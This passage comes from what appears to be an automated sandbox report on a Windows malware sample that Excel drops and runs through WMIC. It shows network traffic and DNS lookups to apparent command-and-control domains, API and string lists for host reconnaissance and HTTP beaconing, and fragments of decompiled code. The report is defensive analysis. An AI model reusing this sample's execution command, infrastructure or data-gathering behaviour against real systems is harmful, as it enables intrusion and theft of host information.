                                                                                                                                    Jun 10, 2021 20:32:55.129504919 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:25.150513887 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:25.200540066 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:25.251198053 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:25.251375914 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:55.256702900 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:33:55.306910992 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:55.358988047 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:33:55.359344959 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:34:25.363687038 CEST49739443192.168.2.4193.178.169.243
                                                                                                                                    Jun 10, 2021 20:34:25.415657997 CEST44349739193.178.169.243192.168.2.4
                                                                                                                                    Jun 10, 2021 20:34:25.464756012 CEST44349739193.178.169.243192.168.2.4

                                                                                                                                    UDP Packets


                                                                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 10, 2021 20:30:50.593030930 CEST | 192.168.2.4 | 8.8.8.8 | 0xf09c | Standard query (0) | pigeonious.com | A (IP address) | IN (0x0001)
Jun 10, 2021 20:30:54.151655912 CEST | 192.168.2.4 | 8.8.8.8 | 0xc717 | Standard query (0) | injuryless.com | A (IP address) | IN (0x0001)

                                                                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 10, 2021 20:30:50.654596090 CEST | 8.8.8.8 | 192.168.2.4 | 0xf09c | No error (0) | pigeonious.com | | 95.142.44.93 | A (IP address) | IN (0x0001)
Jun 10, 2021 20:30:54.212208986 CEST | 8.8.8.8 | 192.168.2.4 | 0xc717 | No error (0) | injuryless.com | | 193.178.169.243 | A (IP address) | IN (0x0001)
Jun 10, 2021 20:35:24.996901989 CEST | 8.8.8.8 | 192.168.2.4 | 0x725c | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)

                                                                                                                                    HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jun 10, 2021 20:30:50.816432953 CEST | 95.142.44.93 | 443 | 192.168.2.4 | 49734 | CN=pigeonious.com | CN=R3, O=Let's Encrypt, C=US | Tue Jun 08 15:19:13 CEST 2021 | Mon Sep 06 15:19:13 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
 | | | | | CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |
 | | | | | CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 | |
Jun 10, 2021 20:30:54.346164942 CEST | 193.178.169.243 | 443 | 192.168.2.4 | 49739 | CN=injuryless.com | CN=R3, O=Let's Encrypt, C=US | Thu May 27 15:42:29 CEST 2021 | Wed Aug 25 15:42:29 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
 | | | | | CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |
 | | | | | CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 | |

                                                                                                                                    Code Manipulations


                                                                                                                                    System Behavior

General

Start time: 20:30:45
Start date: 10/06/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x1150000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:30:51
Start date: 10/06/2021
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: wmic process call create 'C:/Users/Public/SettingSyncHost'
Imagebase: 0x60000
File size: 391680 bytes
MD5 hash: 79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                                                                                    General

                                                                                                                                    Start time:20:30:51
                                                                                                                                    Start date:10/06/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:20:30:52
                                                                                                                                    Start date:10/06/2021
                                                                                                                                    Path:C:\Users\Public\SettingSyncHost
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:/Users/Public/SettingSyncHost
                                                                                                                                    Imagebase:0x390000
                                                                                                                                    File size:511488 bytes
                                                                                                                                    MD5 hash:526D56017EF5105277FE0D366C95C39D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 17%, ReversingLabs
                                                                                                                                    Reputation:low

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:3.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:85.7%
                                                                                                                                      Signature Coverage:25.2%
                                                                                                                                      Total number of Nodes:698
                                                                                                                                      Total number of Limit Nodes:5

                                                                                                                                      Graph


                                                                                                                                      Executed Functions

Control-flow Graph (first node 240: 3cbf90-3cc047)
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003CD2F0: gethostname.WS2_32(?,00000100), ref: 003CD32F
                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,?,?,982F9315), ref: 003CC03F
                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 003CC136
                                                                                                                                      • GetComputerNameExA.KERNELBASE(00000002,?,?,?,?), ref: 003CC19A
Memory Dump Source
• Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
• Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp
• Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
• Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
• Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
• Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
• Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
• Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Name$ComputerFolderPathUsergethostname
                                                                                                                                      • String ID: ", $"adinfo": {$"adinformation":"$"desktop_file_list": [$"domain": "$"file": "$"host":"$"name": "$"part_of_domain":"$"pc_dns_host_name":"", $"pc_domain":"", $"pc_model":""$"pid": "$"processes": [$"size": "$"user":"$WORKGROUP$] ,$no_ad$yes
                                                                                                                                      • API String ID: 1741200219-1158698074
                                                                                                                                      • Opcode ID: ea08f525fa1bec5efc8ad9493c889806cd8ef590e95504350233d86fb963a921
                                                                                                                                      • Instruction ID: c9ad999da57cc90f38aa3e9f86c822c1c673d77f1ab6d593de2600cb672e6bfe
                                                                                                                                      • Opcode Fuzzy Hash: ea08f525fa1bec5efc8ad9493c889806cd8ef590e95504350233d86fb963a921
                                                                                                                                      • Instruction Fuzzy Hash: AA52BF71A102198BDB2BEB24DD59BADB776AF85300F1081EDE109AB381DB749F85CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph (first node 681: 3cceb0-3ccf31)
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,?,?,0040466C,00000002,982F9315,?,?), ref: 003CCF78
                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,?), ref: 003CCF9D
                                                                                                                                      • FindNextFileA.KERNELBASE(?,?,00000000,?,?,?,?), ref: 003CD238
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 003CD249
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$Next$CloseFirst
                                                                                                                                      • String ID: 0
                                                                                                                                      • API String ID: 1884811643-4108050209
                                                                                                                                      • Opcode ID: 79d7a1110da8d485df9beda60bb029e976696097f2e6289b5b5aa1efcc374848
                                                                                                                                      • Instruction ID: e19d480730010eb722d05f0fc23bff23862dff0c63a2c9391a0f83a2c4ae4686
                                                                                                                                      • Opcode Fuzzy Hash: 79d7a1110da8d485df9beda60bb029e976696097f2e6289b5b5aa1efcc374848
                                                                                                                                      • Instruction Fuzzy Hash: 28C19C71D012199FEB25DF54C949BAEBBB5EF44304F1082DCE408AB291DB75AE85CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph (first node 995: 3cbb10-3cbbb5)
                                                                                                                                      APIs
                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 003CBBEB
                                                                                                                                      Strings
                                                                                                                                      • %02X%02X%02X%02X%02X%02X, xrefs: 003CBC98
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdaptersInfo
                                                                                                                                      • String ID: %02X%02X%02X%02X%02X%02X
                                                                                                                                      • API String ID: 3177971545-722279150
                                                                                                                                      • Opcode ID: a6dbce6d891f6d66d06c85a229988100ad8a128af1d7076d38095ab8ce030666
                                                                                                                                      • Instruction ID: 644b6c77c11a1009c63e477251d8f7aa162cd09654b67f74022a9c58302f72d7
                                                                                                                                      • Opcode Fuzzy Hash: a6dbce6d891f6d66d06c85a229988100ad8a128af1d7076d38095ab8ce030666
                                                                                                                                      • Instruction Fuzzy Hash: BAA1F1719002699FDB26DF64CD46FEEBBB5AF45300F0081E9E509AB281DB749E84CF90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph (first node 1153: 391070-3910af)
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E00391070(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                      				void* _v12;
                                                                                                                                      				signed int* _v24;
                                                                                                                                      				intOrPtr _v48;
                                                                                                                                      				intOrPtr* _v60;
                                                                                                                                      				struct HINSTANCE__* _v72;
                                                                                                                                      				void _v268;
                                                                                                                                      				struct HINSTANCE__* _t55;
                                                                                                                                      				_Unknown_base(*)()* _t65;
                                                                                                                                      				_Unknown_base(*)()* _t72;
                                                                                                                                      				void* _t105;
                                                                                                                                      				void* _t106;
                                                                                                                                      				void* _t107;
                                                                                                                                      
                                                                                                                                      				memset( &_v268, 0xcccccccc, 0x42 << 2);
                                                                                                                                      				_t107 = _t106 + 0xc;
                                                                                                                                      				_t5 = _a4 + 0x3c; // 0x3ca104c4
                                                                                                                                      				_v48 = _a4 +  *_t5;
                                                                                                                                      				_v60 = _a4 +  *((intOrPtr*)(_v48 + 0x80));
                                                                                                                                      				_t52 = _v60;
                                                                                                                                      				if(_v60 != _a4) {
                                                                                                                                      					while(1) {
                                                                                                                                      						_t52 = _v60;
                                                                                                                                      						__eflags =  *(_v60 + 0xc);
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						_t55 = LoadLibraryA(_a4 +  *(_v60 + 0xc)); // executed
                                                                                                                                      						__eflags = _t107 - _t107;
                                                                                                                                      						_v72 = E003931A1(_t55, _t107 - _t107);
                                                                                                                                      						__eflags = _v72;
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							_v12 = _a4 +  *((intOrPtr*)(_v60 + 0x10));
                                                                                                                                      							_v24 = _a4 +  *_v60;
                                                                                                                                      							__eflags = _v24 - _a4;
                                                                                                                                      							if(_v24 == _a4) {
                                                                                                                                      								_v24 = _v12;
                                                                                                                                      							}
                                                                                                                                      							while(1) {
                                                                                                                                      								__eflags =  *_v24;
                                                                                                                                      								if( *_v24 == 0) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								__eflags =  *_v24 & 0x80000000;
                                                                                                                                      								if(( *_v24 & 0x80000000) == 0) {
                                                                                                                                      									_t65 = GetProcAddress(_v72, _a4 +  *_v24 + 2);
                                                                                                                                      									__eflags = _t107 - _t107;
                                                                                                                                      									 *_v12 = E003931A1(_t65, _t107 - _t107);
                                                                                                                                      								} else {
                                                                                                                                      									_t72 = GetProcAddress(_v72,  *_v24 & 0x0000ffff);
                                                                                                                                      									__eflags = _t107 - _t107;
                                                                                                                                      									 *_v12 = E003931A1(_t72, _t107 - _t107);
                                                                                                                                      								}
                                                                                                                                      								_v12 = _v12 + 4;
                                                                                                                                      								_v24 =  &(_v24[1]);
                                                                                                                                      							}
                                                                                                                                      							_v60 = _v60 + 0x14;
                                                                                                                                      							continue;
                                                                                                                                      						}
                                                                                                                                      						break;
                                                                                                                                      					}
                                                                                                                                      					L13:
                                                                                                                                      					return E003931A1(_t52, _t105 - _t107 + 0x108);
                                                                                                                                      				}
                                                                                                                                      				goto L13;
                                                                                                                                      			}
















                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryA.KERNELBASE(00000000), ref: 003910CF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                      • Opcode ID: 5501065f3921b8d63ddccf679148ada937219600c59cf382b77989fde1c2a44e
                                                                                                                                      • Instruction ID: 0eea967be51351b02126a642020e5304163913cee788d539594c170f4d5989ba
                                                                                                                                      • Opcode Fuzzy Hash: 5501065f3921b8d63ddccf679148ada937219600c59cf382b77989fde1c2a44e
                                                                                                                                      • Instruction Fuzzy Hash: 7A412C74A0020AEFDF15DF98D890AADBBB2FF48355F154068E946BB351C730AE80CB95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1207 3930e0-393124 GetLocalTime call 3931a1 1210 39312b-39315b call 3931c4 call 393c21 call 3931a1 1207->1210 1211 393126 call 391014 1207->1211 1211->1210
                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                      			E003930E0(intOrPtr __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				struct _SYSTEMTIME _v28;
                                                                                                                                      				char _v224;
                                                                                                                                      				signed int _t9;
                                                                                                                                      				intOrPtr _t16;
                                                                                                                                      				void* _t26;
                                                                                                                                      				intOrPtr _t28;
                                                                                                                                      				void* _t30;
                                                                                                                                      				intOrPtr _t31;
                                                                                                                                      				signed int _t34;
                                                                                                                                      				void* _t35;
                                                                                                                                      
                                                                                                                                      				_t26 = __edx;
                                                                                                                                      				_t20 = __ebx;
                                                                                                                                      				_t30 =  &_v224;
                                                                                                                                      				memset(_t30, 0xcccccccc, 0x37 << 2);
                                                                                                                                      				_t36 = _t35 + 0xc;
                                                                                                                                      				_t31 = _t30 + 0x37;
                                                                                                                                      				_t9 =  *0x3c7040; // 0xbb40e64e
                                                                                                                                      				_v8 = _t9 ^ _t34;
                                                                                                                                      				_t33 = _t35 + 0xc;
                                                                                                                                      				GetLocalTime( &_v28);
                                                                                                                                      				E003931A1( &_v28, _t35 + 0xc - _t36);
                                                                                                                                      				if((_v28.wYear & 0x0000ffff) == 0x7e5) {
                                                                                                                                      					L00391014(__ebx, _t26, _t31, _t33); // executed
                                                                                                                                      				}
                                                                                                                                      				_push(0);
                                                                                                                                      				E003931C4(0x39315c);
                                                                                                                                      				_pop(_t16);
                                                                                                                                      				_t28 = _t26;
                                                                                                                                      				return E003931A1(E00393C21(_t16, _t20, _v8 ^ _t34, _t28, _t31, _t33), _t34 - _t36 + 0xdc);
                                                                                                                                      			}















                                                                                                                                      APIs
                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0039310E
                                                                                                                                      • @_RTC_CheckStackVars@8.LIBCMT ref: 00393137
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckLocalStackTimeVars@8
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1854921025-0
                                                                                                                                      • Opcode ID: 6ffbaed7cb0a24f7afd4c68f7a14e829af79df5c4f66a10494730a3a7758362b
                                                                                                                                      • Instruction ID: fad661834c50d6fd881b0f0c117905922924c5bf0f46468c69878d255d7766c2
                                                                                                                                      • Opcode Fuzzy Hash: 6ffbaed7cb0a24f7afd4c68f7a14e829af79df5c4f66a10494730a3a7758362b
                                                                                                                                      • Instruction Fuzzy Hash: 5FF0A9B2E040085AEB11B7A9EC42ABEB7A9DB84311F510076E909E7251E9255E44C6E1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00049AC6,003D9359), ref: 003D9ABF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 89f570207f5409718e96a642a08c7cfa43abd59978e3cfb76bfe52bc9c144bcd
                                                                                                                                      • Instruction ID: 10b9c1d8b974ae243b6f899c19d57575df0b8cd37143a0da4592f3242f1a17b7
                                                                                                                                      • Opcode Fuzzy Hash: 89f570207f5409718e96a642a08c7cfa43abd59978e3cfb76bfe52bc9c144bcd
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      [control_flow_graph starting at block 3d6cf0; legend: Executed / Not Executed; graph image not recoverable]
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleWindow.KERNEL32(00000000,982F9315), ref: 003D6D1F
                                                                                                                                      • ShowWindow.USER32(00000000), ref: 003D6D26
                                                                                                                                      • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 003D6F1D
                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000001), ref: 003D6F5B
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D6F71
                                                                                                                                      • GetLastError.KERNEL32 ref: 003D6F77
                                                                                                                                      • GetLastError.KERNEL32(POST,00000004,004044A0,?,/?id=,00000005,?,?,004044A0,00000000,?,00000001,00000000,004048E8,00000001,00000001), ref: 003D7390
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D73C2
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D73CA
                                                                                                                                        • Part of subcall function 003D6A10: __Xtime_get_ticks.LIBCPMT ref: 003D6A32
                                                                                                                                        • Part of subcall function 003D6A10: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6A40
                                                                                                                                        • Part of subcall function 003CAB90: Concurrency::cancel_current_task.LIBCPMT ref: 003CAC49
                                                                                                                                        • Part of subcall function 003D6AC0: __Xtime_get_ticks.LIBCPMT ref: 003D6AF3
                                                                                                                                        • Part of subcall function 003D6AC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B01
                                                                                                                                        • Part of subcall function 003D6AC0: __Xtime_get_ticks.LIBCPMT ref: 003D6B1B
                                                                                                                                        • Part of subcall function 003D6AC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B29
                                                                                                                                        • Part of subcall function 003D6AC0: __Xtime_get_ticks.LIBCPMT ref: 003D6B4B
                                                                                                                                        • Part of subcall function 003D6AC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D6B59
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D749B
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D74A3
                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,982F9315), ref: 003D7975
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Internet$CloseHandle$Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@$ErrorLast$Window$Concurrency::cancel_current_taskConnectConsoleOpenShow
                                                                                                                                      • String ID: /?id=$0J@$0`=$GET$Internet connection failed, error code = $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36$POST$Sending initial request failed, error code$Sending timer request failed, error code$ess.com$injuryl
                                                                                                                                      • API String ID: 172437446-746527591
                                                                                                                                      • Opcode ID: f10b0ede28213c4b9878ab48ec8c1f376b67f32a97dfb87d5d9ddad8275b3687
                                                                                                                                      • Instruction ID: 8a50ad18894c433cee11953073ad16db593db3a25db2e292dbdd59f6ff453f4c
                                                                                                                                      • Opcode Fuzzy Hash: f10b0ede28213c4b9878ab48ec8c1f376b67f32a97dfb87d5d9ddad8275b3687
                                                                                                                                      • Instruction Fuzzy Hash: B072F272D002488FEB16DB68DD49BEDBBB6AF45304F10819AE008BB3D1EB755E84CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      [control_flow_graph starting at block 392a00; legend: Executed / Not Executed; graph image not recoverable. API calls named in the graph: GetModuleHandleW, GetModuleFileNameW, CreateFileW, GetFileSize, GlobalAlloc, SetFilePointer, ReadFile, GetSystemTime, GetModuleHandleA, GetTickCount]
                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                      			E00392A00(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                      				void _v196;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t18;
                                                                                                                                      				void* _t24;
                                                                                                                                      				void* _t28;
                                                                                                                                      				void* _t34;
                                                                                                                                      				long _t35;
                                                                                                                                      				void* _t41;
                                                                                                                                      				long _t43;
                                                                                                                                      				int _t44;
                                                                                                                                      				void* _t50;
                                                                                                                                      				void* _t60;
                                                                                                                                      				void* _t72;
                                                                                                                                      				void* _t73;
                                                                                                                                      				void* _t75;
                                                                                                                                      				void* _t88;
                                                                                                                                      				intOrPtr _t94;
                                                                                                                                      				intOrPtr _t111;
                                                                                                                                      				intOrPtr _t113;
                                                                                                                                      				void* _t114;
                                                                                                                                      				void* _t119;
                                                                                                                                      				void* _t121;
                                                                                                                                      				void* _t123;
                                                                                                                                      				void* _t131;
                                                                                                                                      				void* _t132;
                                                                                                                                      				void* _t135;
                                                                                                                                      				void* _t136;
                                                                                                                                      				void* _t157;
                                                                                                                                      				void* _t158;
                                                                                                                                      				long long* _t160;
                                                                                                                                      				void* _t161;
                                                                                                                                      				long long* _t162;
                                                                                                                                      				void* _t163;
                                                                                                                                      				long long* _t164;
                                                                                                                                      				void* _t165;
                                                                                                                                      				long long* _t166;
                                                                                                                                      				void* _t167;
                                                                                                                                      				long long* _t168;
                                                                                                                                      				void* _t169;
                                                                                                                                      				long long* _t170;
                                                                                                                                      				long long* _t172;
                                                                                                                                      				long long* _t175;
                                                                                                                                      				void* _t176;
                                                                                                                                      				long long* _t177;
                                                                                                                                      				long long* _t179;
                                                                                                                                      				void* _t181;
                                                                                                                                      				long long* _t183;
                                                                                                                                      				void* _t184;
                                                                                                                                      				long long* _t185;
                                                                                                                                      				long long* _t188;
                                                                                                                                      				long long* _t191;
                                                                                                                                      				long long* _t194;
                                                                                                                                      				long long* _t197;
                                                                                                                                      				void* _t199;
                                                                                                                                      				long long _t222;
                                                                                                                                      				long long _t223;
                                                                                                                                      				long long _t224;
                                                                                                                                      				long long _t225;
                                                                                                                                      				long long _t226;
                                                                                                                                      				long long _t227;
                                                                                                                                      				long long _t228;
                                                                                                                                      				long long _t229;
                                                                                                                                      				long long _t230;
                                                                                                                                      				long long _t231;
                                                                                                                                      				long long _t232;
                                                                                                                                      				long long _t233;
                                                                                                                                      				long long _t234;
                                                                                                                                      				long long _t235;
                                                                                                                                      				long long _t236;
                                                                                                                                      				long long _t237;
                                                                                                                                      
                                                                                                                                      				_t135 = __edx;
                                                                                                                                      				_t128 = __ebx;
                                                                                                                                      				memset( &_v196, 0xcccccccc, 0x30 << 2);
                                                                                                                                      				_t160 = _t158 + 0xc - 8;
                                                                                                                                      				_t222 =  *0x3bbc50;
                                                                                                                                      				 *_t160 = _t222;
                                                                                                                                      				E00393700(_t135);
                                                                                                                                      				 *_t160 = _t222;
                                                                                                                                      				E003935B0(_t135);
                                                                                                                                      				 *_t160 = _t222;
                                                                                                                                      				E00393460(_t135);
                                                                                                                                      				 *_t160 = _t222;
                                                                                                                                      				E00393340();
                                                                                                                                      				st0 = _t222;
                                                                                                                                      				_t161 = _t160 + 8;
                                                                                                                                      				E003931A1(GetModuleFileNameW(E003931A1(GetModuleHandleW(0), _t161 - _t161), "C:\Users\Public\SettingSyncHost", 0x208), _t161 - _t161);
                                                                                                                                      				_t162 = _t161 - 8;
                                                                                                                                      				_t223 =  *0x3bbc50;
                                                                                                                                      				 *_t162 = _t223;
                                                                                                                                      				E00393700(_t135);
                                                                                                                                      				 *_t162 = _t223;
                                                                                                                                      				E003935B0(_t135);
                                                                                                                                      				 *_t162 = _t223;
                                                                                                                                      				E00393460(_t135);
